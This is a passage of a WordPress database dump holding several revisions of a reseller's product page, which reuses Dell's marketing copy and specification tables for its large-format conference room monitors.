center;\">[maxbutton id=\"14\" ]</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-10-03 15:42:00','2019-10-03 07:42:00','',1532,'https://bintara.com.my/blog/2019/10/03/1532-revision-v1/',0,'revision','',0),(3668,1,'2019-10-25 16:30:35','2019-10-25 08:30:35','<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_02.jpg\" alt=\"Transform your meeting space\" />\r\n<h2>Transform your meeting space</h2>\r\nDell, the worldâ€™s number one monitor brand<a rel=\"technotes:monitor-tracker\">*</a>, has the tools and technology you need to facilitate teamwork. With our open standards approach andÂ wide variety of displays ranging from 55â€ to 86â€, itâ€™s easy to find andÂ customize a solutionÂ that keeps your team engaged and lets your business thrive.\r\n<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Maximize your teamâ€™s productivity</h2>\r\nMake meetings more efficient with our collaboration-enhancing features and easy connectivity.\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_03.jpg\" alt=\"Maximize your teamâ€™s productivity\" />\r\n\r\n<img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_04.jpg\" alt=\"Next-level teamwork\" width=\"347\" height=\"256\" />\r\n<h2>Next-level teamwork</h2>\r\n<strong>More ways to interact:</strong>Â Group collaboration is more seamless and intuitive than ever with our interactive monitors<a rel=\"technotes:available-monitors\">*</a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.\r\n\r\n<strong>Collaboration solutions:</strong>Â Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a rel=\"technotes:available-monitors\">*</a>.\r\n\r\n<strong>Collaboration for all:</strong>Â Dell Screen Drop feature<a rel=\"technotes:available-monitors\">*</a>Â lets you lower the displayed image so that itâ€™s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.','Dell Large Format Displays','','inherit','closed','closed','','3661-revision-v1','','','2019-10-25 16:30:35','2019-10-25 08:30:35','',3661,'https://bintara.com.my/blog/2019/10/25/3661-revision-v1/',0,'revision','',0),(3672,1,'2019-10-25 17:29:04','2019-10-25 09:29:04','<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_02.jpg\" alt=\"Transform your meeting space\" /></p><h2>Transform your meeting space</h2>Dell, the worldâ€™s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach andÂ wide variety of displays ranging from 55â€ to 86â€, itâ€™s easy to find andÂ customize a solutionÂ that keeps your team engaged and lets your business thrive.		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Maximize your teamâ€™s productivity</h2>Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_03.jpg\" alt=\"Maximize your teamâ€™s productivity\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_04.jpg\" alt=\"Next-level teamwork\" width=\"347\" height=\"256\" /></p><h2>Next-level teamwork</h2><strong>More ways to interact:</strong>Â Group collaboration is more seamless and intuitive than ever with our interactive monitors<a rel=\"technotes:available-monitors\">*</a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br /><br /><p><strong>Collaboration solutions:</strong>Â Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a rel=\"technotes:available-monitors\">*</a>.<br /><br /><strong>Collaboration for all:</strong>Â Dell Screen Drop feature<a rel=\"technotes:available-monitors\">*</a>Â lets you lower the displayed image so that itâ€™s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.</p>		\n		<h2>Captivate your audience</h2><ul><li><strong>Make the most of your meeting:</strong>Â With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.</li></ul><ul><li><strong>Present crisply and clearly:</strong>Â Monitor scaling technology allows you to capture your audienceâ€™s attention with exceptionally clear text and vivid visuals.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_05.jpg\" alt=\"Captivate your audience\" width=\"360\" height=\"267\" /></p>		\n			<h2>Dell Large Format Monitors</h2>		\n		https://www.youtube.com/watch?v=Z98yJnbXWq8		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Flexible IT solutions</h2>A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_06.jpg\" alt=\"Flexible IT solutions\" width=\"445\" height=\"351\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_07.jpg\" alt=\"Adapts to business needs. Present and future.\" /></p><h2>Adapts to business needs. Present and future.</h2><ul><li><strong>Solutions that work with you:</strong>Â Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology youâ€™re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can alsoÂ be loaded with your preferred corporate image, so that it adheres to your security and service standards.</li></ul><ul><li><strong>Customized to your needs:</strong>Â Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.</li></ul>		\n		<h2>Easy to deploy. Simple to manage.</h2><ul><li><strong>A smooth deployment:</strong>Â With a few painless steps, and a couple of extra hands, itâ€™s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether thatâ€™s a mobile cart, stand or wall mount.</li><li><strong>Manage your meeting spaces:</strong>Â With RS232 and RJ45<a rel=\"technotes:available-monitors\">*</a>Â interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_08.jpg\" alt=\"Easy to deploy. Simple to manage.\" width=\"355\" height=\"263\" /></p><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_09.jpg\" alt=\"Ultimate management\" width=\"337\" height=\"256\" /></p><h2>Ultimate management</h2><ul><li><strong>Seamless integration for easy access:</strong>Â Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a rel=\"technotes:available-monitors\">*</a>Â without the need for a separate power cord, simplifying access to WiFi, annotationÂ andÂ meeting room management applications.</li><li><strong>Easy to upgrade:</strong>Â Thanks toÂ it\'sÂ modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.</li></ul>		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Solutions you can count on</h2>Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_10.jpg\" alt=\"Solutions you can count on\" width=\"412\" height=\"325\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_11.jpg\" alt=\"Dependable reliability\" /></p><h2>Dependable reliability</h2><strong>Peace of mind comes standard:</strong>Â Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a rel=\"technotes:advanced-exchange-service-monitors\">*</a>Â so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a rel=\"technotes:hardware-warranty-monitors\">*</a>Â up to 5-years for additional support.<br /><br /><strong>Low maintenance. Simple manageability:Â </strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.','Dell Large Format Displays','','inherit','closed','closed','','3661-revision-v1','','','2019-10-25 17:29:04','2019-10-25 09:29:04','',3661,'https://bintara.com.my/blog/2019/10/25/3661-revision-v1/',0,'revision','',0),(3675,1,'2019-10-29 10:08:00','2019-10-29 02:08:00','<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_02.jpg\" alt=\"Transform your meeting space\" /></p><h2>Transform your meeting space</h2>Dell, the worldâ€™s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach andÂ wide variety of displays ranging from 55â€ to 86â€, itâ€™s easy to find andÂ customize a solutionÂ that keeps your team engaged and lets your business thrive.		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Maximize your teamâ€™s productivity</h2>Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_03.jpg\" alt=\"Maximize your teamâ€™s productivity\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_04.jpg\" alt=\"Next-level teamwork\" width=\"347\" height=\"256\" /></p><h2>Next-level teamwork</h2><strong>More ways to interact:</strong>Â Group collaboration is more seamless and intuitive than ever with our interactive monitors<a rel=\"technotes:available-monitors\">*</a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br /><br /><p><strong>Collaboration solutions:</strong>Â Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a rel=\"technotes:available-monitors\">*</a>.<br /><br /><strong>Collaboration for all:</strong>Â Dell Screen Drop feature<a rel=\"technotes:available-monitors\">*</a>Â lets you lower the displayed image so that itâ€™s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.</p>		\n		<h2>Captivate your audience</h2><ul><li><strong>Make the most of your meeting:</strong>Â With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.</li></ul><ul><li><strong>Present crisply and clearly:</strong>Â Monitor scaling technology allows you to capture your audienceâ€™s attention with exceptionally clear text and vivid visuals.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_05.jpg\" alt=\"Captivate your audience\" width=\"360\" height=\"267\" /></p>		\n			<h2>Dell Large Format Monitors</h2>		\n		https://www.youtube.com/watch?v=Z98yJnbXWq8		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Flexible IT solutions</h2>A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_06.jpg\" alt=\"Flexible IT solutions\" width=\"445\" height=\"351\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_07.jpg\" alt=\"Adapts to business needs. Present and future.\" /></p><h2>Adapts to business needs. Present and future.</h2><ul><li><strong>Solutions that work with you:</strong>Â Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology youâ€™re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can alsoÂ be loaded with your preferred corporate image, so that it adheres to your security and service standards.</li></ul><ul><li><strong>Customized to your needs:</strong>Â Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.</li></ul>		\n		<h2>Easy to deploy. Simple to manage.</h2><ul><li><strong>A smooth deployment:</strong>Â With a few painless steps, and a couple of extra hands, itâ€™s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether thatâ€™s a mobile cart, stand or wall mount.</li><li><strong>Manage your meeting spaces:</strong>Â With RS232 and RJ45<a rel=\"technotes:available-monitors\">*</a>Â interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_08.jpg\" alt=\"Easy to deploy. Simple to manage.\" width=\"355\" height=\"263\" /></p><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_09.jpg\" alt=\"Ultimate management\" width=\"337\" height=\"256\" /></p><h2>Ultimate management</h2><ul><li><strong>Seamless integration for easy access:</strong>Â Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a rel=\"technotes:available-monitors\">*</a>Â without the need for a separate power cord, simplifying access to WiFi, annotationÂ andÂ meeting room management applications.</li><li><strong>Easy to upgrade:</strong>Â Thanks toÂ it\'sÂ modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.</li></ul>		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Solutions you can count on</h2>Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_10.jpg\" alt=\"Solutions you can count on\" width=\"412\" height=\"325\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_11.jpg\" alt=\"Dependable reliability\" /></p><h2>Dependable reliability</h2><strong>Peace of mind comes standard:</strong>Â Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a rel=\"technotes:advanced-exchange-service-monitors\">*</a>Â so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a rel=\"technotes:hardware-warranty-monitors\">*</a>Â up to 5-years for additional support.<br /><br /><strong>Low maintenance. Simple manageability:Â </strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.		\n		<h2 style=\"text-align: center;\">C5519Q</h2><h2 style=\"text-align: center;\">C5518QT</h2><h2 style=\"text-align: center;\">C7017T</h2><p>Â </p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c5519q/global_spi/monitor-c5519q-campaign-hero-504x350-ng.psd?fmt=jpg\" alt=\"C5519Q Monitor\" /></p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c5518qt/pdp/dell-monitor-c5518qt-pdp-03-v2.jpg?fmt=jpg\" alt=\"Dell Monitor C5518QT\" /></p><p>Â </p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c7017t/global_spi/dell-monitor-c7017t-black-right-usage-hero-504x350-ng.psd?fmt=png-alpha\" alt=\"Dell 70 (C7017t) Conference Room Monitor\" /></p><p style=\"text-align: right;\"><strong>Resolution</strong><br /><strong>OptiPlex Micro Mounting via</strong><br /><strong>Touch/Non-Touch</strong><br /><strong>Image Size</strong><br /><strong>Panel Type</strong><br /><strong>Surface</strong><br /><strong>Mount</strong><br /><strong>Connectivity</strong></p><p>4K<br />Optional bracket<br />Non-touch<br />54.6 in<br />Vertical Alignment Glass<br />Anti-glare<br />Optional wall mount<br />2x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>4K<br />PC slot<br />20 points of touch<br />54.6 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />7x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>Full HD<br />Optional bracket<br />10 points of touch<br />69.5 in<br />Vertical Alignment Glass<br />Anti-glare, Anti-smudge<br />Wall mount included<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p style=\"text-align: right;\"><strong>Mount</strong></p><p>Optional wall mount</p><p>Optional wall mount</p><p>Wall mount included</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><h2 style=\"text-align: center;\">C7520QT</h2><h2 style=\"text-align: center;\">C8618QT</h2><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c7520qt/global_spi/ng/monitor-c7520qt-campaign-hero-504x350-ng.png?fmt=jpg\" alt=\"Dell 75 4K Interactive Touch Monitor: C7520QT\" /></p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c8618qt/global_spi/monitor-c8618qt-black-right-usage-hero-504x350-ng.psd?fmt=jpg\" alt=\"Dell-C8618QT-Monitor \" /></p><p style=\"text-align: right;\"><strong>Resolution</strong><br /><strong>OptiPlex Micro Mounting via</strong><br /><strong>Touch/Non-Touch</strong><br /><strong>Image Size</strong><br /><strong>Panel Type</strong><br /><strong>Surface</strong><br /><strong>Mount</strong><br /><strong>Connectivity</strong></p><p>4K<br />PC slot<br />20 points of touch<br />75 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>4K<br />PC slot<br />20 points of touch<br />85.6 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />4x HDMI<br />1x DisplayPort<br />1x VGA<br />7x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p style=\"text-align: right;\"><strong>Mount</strong></p><p>Optional wall mount</p><p>Optional wall mount</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p>','Dell Large Format Displays','','inherit','closed','closed','','3661-revision-v1','','','2019-10-29 10:08:00','2019-10-29 02:08:00','',3661,'https://bintara.com.my/blog/2019/10/29/3661-revision-v1/',0,'revision','',0),(3676,1,'2019-10-29 10:09:17','2019-10-29 02:09:17','<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_02.jpg\" alt=\"Transform your meeting space\" /></p><h2>Transform your meeting space</h2>Dell, the worldâ€™s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach andÂ wide variety of displays ranging from 55â€ to 86â€, itâ€™s easy to find andÂ customize a solutionÂ that keeps your team engaged and lets your business thrive.		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Maximize your teamâ€™s productivity</h2>Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_03.jpg\" alt=\"Maximize your teamâ€™s productivity\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_04.jpg\" alt=\"Next-level teamwork\" width=\"347\" height=\"256\" /></p><h2>Next-level teamwork</h2><strong>More ways to interact:</strong>Â Group collaboration is more seamless and intuitive than ever with our interactive monitors<a rel=\"technotes:available-monitors\">*</a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br /><br /><p><strong>Collaboration solutions:</strong>Â Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a rel=\"technotes:available-monitors\">*</a>.<br /><br /><strong>Collaboration for all:</strong>Â Dell Screen Drop feature<a rel=\"technotes:available-monitors\">*</a>Â lets you lower the displayed image so that itâ€™s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.</p>		\n		<h2>Captivate your audience</h2><ul><li><strong>Make the most of your meeting:</strong>Â With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.</li></ul><ul><li><strong>Present crisply and clearly:</strong>Â Monitor scaling technology allows you to capture your audienceâ€™s attention with exceptionally clear text and vivid visuals.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_05.jpg\" alt=\"Captivate your audience\" width=\"360\" height=\"267\" /></p>		\n			<h2>Dell Large Format Monitors</h2>		\n		https://www.youtube.com/watch?v=Z98yJnbXWq8		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Flexible IT solutions</h2>A variety of customization, deployment and management options make Dell Large Format Monitors easy to manage.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_06.jpg\" alt=\"Flexible IT solutions\" width=\"445\" height=\"351\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_07.jpg\" alt=\"Adapts to business needs. Present and future.\" /></p><h2>Adapts to business needs. Present and future.</h2><ul><li><strong>Solutions that work with you:</strong>Â Dell Large Format Monitors work with a variety of hardware and software, so you can continue using the technology youâ€™re comfortable with or choose to use some of ours. This makes your new monitor inherently easy to deploy, maintain and use. It can alsoÂ be loaded with your preferred corporate image, so that it adheres to your security and service standards.</li></ul><ul><li><strong>Customized to your needs:</strong>Â Your Large Format Monitor will fit your business needs as they evolve. Select the technology you need without paying for unnecessary features and, with its modular capabilities, you can even scale up or down as your needs change.</li></ul>		\n		<h2>Easy to deploy. Simple to manage.</h2><ul><li><strong>A smooth deployment:</strong>Â With a few painless steps, and a couple of extra hands, itâ€™s simple to install a Dell Large Format Monitor to a solid wall. Our displays are VESA compatible, so you can pick the mounting solution that best fits your space, whether thatâ€™s a mobile cart, stand or wall mount.</li><li><strong>Manage your meeting spaces:</strong>Â With RS232 and RJ45<a rel=\"technotes:available-monitors\">*</a>Â interfaces, you can use remote management tools to maintain and control your Large Format Monitors with a network control system.</li></ul><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_08.jpg\" alt=\"Easy to deploy. Simple to manage.\" width=\"355\" height=\"263\" /></p><p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_09.jpg\" alt=\"Ultimate management\" width=\"337\" height=\"256\" /></p><h2>Ultimate management</h2><ul><li><strong>Seamless integration for easy access:</strong>Â Create an all-in-one solution with the optional Dell OptiPlex Micro PC. It seamlessly integrates into the display<a rel=\"technotes:available-monitors\">*</a>Â without the need for a separate power cord, simplifying access to WiFi, annotationÂ andÂ meeting room management applications.</li><li><strong>Easy to upgrade:</strong>Â Thanks toÂ it\'sÂ modular design, the optional Dell OptiPlex Micro PC can be effortlessly upgraded, or replaced.</li></ul>		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Solutions you can count on</h2>Our low maintenance monitors and reliable service solutions are here to support you through every presentation.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_10.jpg\" alt=\"Solutions you can count on\" width=\"412\" height=\"325\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_11.jpg\" alt=\"Dependable reliability\" /></p><h2>Dependable reliability</h2><strong>Peace of mind comes standard:</strong>Â Your Large Format Monitor comes with a 3-year Advanced Exchange Service<a rel=\"technotes:advanced-exchange-service-monitors\">*</a>Â so that if a replacement becomes necessary, it will be shipped to you the next business day during the Limited Hardware Warranty. And, if you want longer-term coverage, you can extend the Limited Hardware Warranty<a rel=\"technotes:hardware-warranty-monitors\">*</a>Â up to 5-years for additional support.<br /><br /><strong>Low maintenance. Simple manageability:Â </strong>Save your staff time and your company money with these reliable, user-friendly monitors. With no hidden costs, annual maintenance or licensing fees, Dell Large Format Monitors can decrease both trouble tickets and training time for your team.		\n		<h2 style=\"text-align: center;\">C5519Q</h2><h2 style=\"text-align: center;\">C5518QT</h2><h2 style=\"text-align: center;\">C7017T</h2><p>Â </p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c5519q/global_spi/monitor-c5519q-campaign-hero-504x350-ng.psd?fmt=jpg\" alt=\"C5519Q Monitor\" /></p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c5518qt/pdp/dell-monitor-c5518qt-pdp-03-v2.jpg?fmt=jpg\" alt=\"Dell Monitor C5518QT\" /></p><p>Â </p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c7017t/global_spi/dell-monitor-c7017t-black-right-usage-hero-504x350-ng.psd?fmt=png-alpha\" alt=\"Dell 70 (C7017t) Conference Room Monitor\" /></p><p style=\"text-align: right;\"><strong>Resolution</strong><br /><strong>OptiPlex Micro Mounting via</strong><br /><strong>Touch/Non-Touch</strong><br /><strong>Image Size</strong><br /><strong>Panel Type</strong><br /><strong>Surface</strong><br /><strong>Mount</strong><br /><strong>Connectivity</strong></p><p>4K<br />Optional bracket<br />Non-touch<br />54.6 in<br />Vertical Alignment Glass<br />Anti-glare<br />Optional wall mount<br />2x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>4K<br />PC slot<br />20 points of touch<br />54.6 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />7x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>Full HD<br />Optional bracket<br />10 points of touch<br />69.5 in<br />Vertical Alignment Glass<br />Anti-glare, Anti-smudge<br />Wall mount included<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p style=\"text-align: right;\"><strong>Mount</strong></p><p>Optional wall mount</p><p>Optional wall mount</p><p>Wall mount included</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><h2 style=\"text-align: center;\">C7520QT</h2><h2 style=\"text-align: center;\">C8618QT</h2><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c7520qt/global_spi/ng/monitor-c7520qt-campaign-hero-504x350-ng.png?fmt=jpg\" alt=\"Dell 75 4K Interactive Touch Monitor: C7520QT\" /></p><p><img src=\"https://i.dell.com/is/image/DellContent//content/dam/global-site-design/product_images/peripherals/output_devices/dell/monitors/c_series/c8618qt/global_spi/monitor-c8618qt-black-right-usage-hero-504x350-ng.psd?fmt=jpg\" alt=\"Dell-C8618QT-Monitor \" /></p><p style=\"text-align: right;\"><strong>Resolution</strong><br /><strong>OptiPlex Micro Mounting via</strong><br /><strong>Touch/Non-Touch</strong><br /><strong>Image Size</strong><br /><strong>Panel Type</strong><br /><strong>Surface</strong><br /><strong>Mount</strong><br /><strong>Connectivity</strong></p><p>4K<br />PC slot<br />20 points of touch<br />75 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />3x HDMI<br />1x DisplayPort<br />1x VGA<br />4x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p>4K<br />PC slot<br />20 points of touch<br />85.6 in<br />IPS Glass<br />Anti-glare, Anti-smudge<br />Optional wall mount<br />4x HDMI<br />1x DisplayPort<br />1x VGA<br />7x USB<br />1x Audio-In/-Out<br />1x RS232<br />1x RJ45</p><p style=\"text-align: right;\"><strong>Mount</strong></p><p>Optional wall mount</p><p>Optional wall mount</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p><p style=\"text-align: center;\">[maxbutton id=\"15\"]</p>','Dell Large Format Displays','','inherit','closed','closed','','3661-revision-v1','','','2019-10-29 10:09:17','2019-10-29 02:09:17','',3661,'https://bintara.com.my/blog/2019/10/29/3661-revision-v1/',0,'revision','',0),(3678,1,'2019-10-29 10:20:50','2019-10-29 02:20:50','<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_02.jpg\" alt=\"Transform your meeting space\" /></p><h2>Transform your meeting space</h2>Dell, the worldâ€™s number one monitor brand, has the tools and technology you need to facilitate teamwork. With our open standards approach andÂ wide variety of displays ranging from 55â€ to 86â€, itâ€™s easy to find andÂ customize a solutionÂ that keeps your team engaged and lets your business thrive.		\n		<h2 style=\"text-align: center;\" data-testid=\"producthero_module_title\">Maximize your teamâ€™s productivity</h2>Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_03.jpg\" alt=\"Maximize your teamâ€™s productivity\" /></p>		\n		<p><img src=\"https://i.dell.com/sites/csimages/Product_Imagery/all/LFD-franchisepage-responsive_04.jpg\" alt=\"Next-level teamwork\" width=\"347\" height=\"256\" /></p><h2>Next-level teamwork</h2><strong>More ways to interact:</strong>Â Group collaboration is more seamless and intuitive than ever with our interactive monitors<a rel=\"technotes:available-monitors\">*</a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br /><br /><p><strong>Collaboration solutions:</strong>Â Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a rel=\"technotes:available-monitors\">*</a>.<br /><br /><strong>Collaboration for all:</strong>Â Dell Screen Drop feature<a rel=\"technotes:available-monitors\">*</a>Â lets you lower the displayed image so that itâ€™s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.</p>		\n		<h2>Captivate your audience</h2><ul><li><strong>Make the most of your meeting:</strong>Â With a wide variety of connectivity options, you can quickly connect to the display and seamlessly switch between presenters, allowing your audience to enjoy a smooth and continuous presentation.</li></ul><ul><li><strong>Present crisply and clearly:</strong>Â Monitor scaling technology allows you to capture your audienceâ€™s attention with exceptionally clear text and 